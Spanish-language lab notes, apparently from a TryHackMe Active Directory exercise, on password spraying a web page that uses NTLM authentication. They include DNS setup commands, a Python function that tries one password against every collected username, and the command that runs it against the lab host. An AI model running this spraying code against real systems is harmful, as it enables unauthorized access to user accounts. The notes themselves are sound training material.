Teniendo una pagina que se autentica con ntlm se puede hacer un spray de password sobre una misma contraseña a todos los usuarios que se pudieron recolectar

Aveces tenemos que configurar el dns de la página para poder visualizarla. systemd-resolve --interface breachad --set-dns $THMDCIP --set-domain za.tryhackme.com

systemd-resolve --interface breachad --set-dns 10.200.20.101 --set-domain za.tryhackme.com

nslookup thmdc.za.tryhackme.com

def password_spray(self, password, url): print ("[] Starting passwords spray attack using the following password: " + password) #Reset valid credential counter count = 0 #Iterate through all of the possible usernames for user in self.users: #Make a request to the website and attempt Windows Authentication response = requests.get(url, auth=HttpNtlmAuth(self.fqdn + "\\" + user, password)) #Read status code of response to determine if authentication was successful if (response.status_code == self.HTTP_AUTH_SUCCEED_CODE): print ("[+] Valid credential pair found! Username: " + user + " Password: " + password) count += 1 continue if (self.verbose): if (response.status_code == self.HTTP_AUTH_FAILED_CODE): print ("[-] Failed login with Username: " + user) print ("[] Password spray attack completed, " + str(count) + " valid credential pairs found")

python ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>

python ntlm_passwordspray.py -u usernames.txt -f za.tryhackme.com -p Changeme123 -a http://ntlmauth.za.tryhackme.com/